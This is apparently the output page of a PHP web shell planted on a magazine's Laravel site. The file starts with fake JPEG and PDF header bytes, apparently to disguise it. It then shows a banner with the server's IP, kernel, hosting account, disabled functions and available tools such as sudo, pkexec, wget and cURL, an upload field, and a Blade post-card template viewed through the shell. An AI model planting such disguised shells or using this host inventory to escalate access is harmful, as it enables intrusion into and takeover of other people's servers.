ÿØÿà JFIF ÿþ; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 157.90.209.209 / Your IP : 216.73.216.185 [ Web Server : Apache System : Linux hcomm124.dns-wk.info 4.18.0-553.64.1.el8_10.x86_64 #1 SMP Mon Jul 28 12:01:56 EDT 2025 x86_64 User : evidenciarevista ( 1049) PHP Version : 7.2.34 Disable Function : exec,passthru,shell_exec,system Domains : 216 Domains MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /home/evidenciarevista/resources/views/pages/posts/ |
Upload File : |
<div class="col-lg-6 col-md-12 col-sm-12 col-xs-12"> <div class="card margin-bottom"> <div class="title-category bg-inverse text-white text-center"><h4>{{ $post->category->name }}</h4></div> <div style="height: 250px; overflow-y: hidden; display: block;"> <a href="{{ route('post.show', ['id' => $post->id, 'slug' => Illuminate\Support\Str::slug($post->title)]) }}"> <img class="card-img-top" src="http://admin.evidenciarevista.com.br/uploads/post/{{ $post->file }}" alt="evidencia" width="100%"> </a> </div> <div class="card-block"> <div style="height: 80px; overflow-y: hidden;"> <h4 class="card-title">{{ $post->title }}</h4> </div> <p class="card-text" style="height: 60px; overflow-y: hidden;">{{ Illuminate\Support\Str::limit($post->short_description, 100) }}</p> <a href="{{ route('post.show', ['id' => $post->id, 'slug' => Illuminate\Support\Str::slug($post->title)]) }}" class="btn btn-warning no-radius"> <i class="fa fa-link" aria-hidden="true"></i> Visualizar </a> <hr> @include('pages.posts.sign') </div> </div> </div>